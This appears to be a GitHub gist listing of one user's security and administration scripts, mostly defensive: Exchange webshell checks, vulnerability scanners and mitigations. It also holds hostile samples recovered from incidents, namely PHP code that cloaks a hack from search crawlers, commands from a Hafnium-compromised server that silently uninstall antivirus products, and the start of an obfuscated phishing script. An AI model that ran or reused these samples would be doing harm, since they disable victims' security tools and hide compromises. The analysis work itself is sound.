View ExchangeIntegrity.ps1
Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
View hacked.php
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
technion / Exchange Version.nse
Created Nov 17, 2021
Scan Microsoft Exchange Version for vulnerability
View Exchange Version.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {""}
license = "Same as Nmap--See"
categories = {"discovery", "safe"}
-- Detection rule based on:
technion / CVE-2021-40444Mit.ps1
Last active Sep 12, 2021
CVE-2021-40444 Mitigation Script
View CVE-2021-40444Mit.ps1
Set-Strictmode -Version 2
# Applies reg keys from
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
if (-not (Test-Path $RegPath)) {
New-Item $RegPath -Force
technion / AutorunsVT.ps1
Created Apr 23, 2021
Review CSV file from autorunsc.exe a and handle Virustotal detections
View AutorunsVT.ps1
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
Write-Output $detection
technion / Malicious.ps1
Created Mar 20, 2021
RE on Hafnium exploited server
View Malicious.ps1
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / LicenseManagement.ps1
Created Nov 13, 2020
Office 365 license management
View LicenseManagement.ps1
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
# $user should be populated with
# $user = Get-AzureADUser -ObjectId
technion / tank.wa
Created Nov 12, 2020
Warlock tanking weak aura
View tank.wa
technion / Scan-Netlogon-Secure.ps1
Last active Aug 16, 2020
Search domain controllers for events relating to Netlogon vulnerability
View Scan-Netlogon-Secure.ps1
# More information:
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
# Errors are ignored so as not to throw an exception if there are no such logs found
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
technion / phishing.js
Last active Aug 12, 2020
blog of phishing code
View phishing.js
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"